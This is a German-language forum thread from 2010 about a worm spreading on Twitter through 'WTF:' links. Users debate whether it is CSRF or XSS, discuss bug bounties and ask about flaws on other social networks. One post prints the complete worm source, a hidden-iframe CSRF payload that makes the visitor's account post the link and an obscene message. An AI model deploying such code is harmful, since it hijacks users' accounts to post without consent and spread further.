Kurzmeldung! Wieder ein Wurm auf Twitter unterwegs

Druckbare Version

26.09.2010, 19:21
XX

Kurzmeldung! Wieder ein Wurm auf Twitter unterwegs

Klickt nicht auf Links, die nach einem "WTF:" kommen! Don’t Click The WTF Link On Twitter Unless You DO Like Sex With Goats
26.09.2010, 19:43
BCfu

Hab hier ne kleine Erklärung dazu gefunden. Meiner Meinung nach schon fast zu simpel um als Wurm durchzugehn...
26.09.2010, 20:10
epicfa!l

Irgendwie macht Twitter es den "bösen Menschen" im Moment echt sehr leicht.
Bin ja mal gespannt, wie das wird wenn das neue Update komplett da ist.
Dann werden wieder etliche Sicherheitslücken eröffnet.

Vielleicht sollte Twitter sich mal ein Beispiel an der Post nehmen, und Preisgelder für gefundene Lücken aussetzen.
Finde die Idee eigentlich ziemlich gut, zu lesen hier.
26.09.2010, 20:13
0x30

Ist aber dennoch ein Wurm.
26.09.2010, 20:47
rage666

Twitter scheint ja echt voller Löcher zu sein.
26.09.2010, 20:53
stayla

Twitter sollte mal öfters hier rein schauen xD
26.09.2010, 21:29
Donut

Is doch eh schon gefixxt..
26.09.2010, 21:58
SFX

Zitat:

Zitat von stayla

Twitter sollte mal öfters hier rein schauen xD

soweit ich das jetzt beurteilen kann geht es da nicht um eine xss, sondern um eine csrf Verwundbarkeit..

Und wenn ich mir die ganzen Webpanels von den uEbEr133337³³ g0il3n Stealern, Bots und was halt sonst noch alles ein Panel hat, scheinen hier nur sehr wenige zu wissen was das ist..
27.09.2010, 19:18
pima

Twitter hat immer mehr Nutzer und so langsam wirds für Cracker/Hacker/whatever interessanter Profit daraus zu schlagen, somit wird vermehrt nach Löchern gesucht die früher einfach irrelevant waren.
27.09.2010, 19:43
wacked

Code:

<html> <head></head> <body> <script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html>

priv7 twitter worm src. no leak plox bro
27.09.2010, 19:50
SFX

Den Sourcecode von einem XSS Wurm (der bereits im Umlauf ist) auftreiben ist keine besondere Kunst ^^
27.09.2010, 20:13
epicfa!l

Zitat:

Zitat von pima

Twitter hat immer mehr Nutzer und so langsam wirds für Cracker/Hacker/whatever interessanter Profit daraus zu schlagen

Komisch finde ich, dass bei Twitter immer wieder solche interessanten Lücken auftauchen, mir von Facebook und anderen Social Networks aber keine bekannt sind.

Gab es bei anderen Social Networks auch schonmal solche Fälle?
Das man eine Sicherheitslücke in den Statusnachrichten hatte oder sonst wo?
27.09.2010, 21:57
XeNo[P]HoPe

war es nicht damals so das man in schuelervz einfach
die passwörter aus dem Quell text lesen konnte ?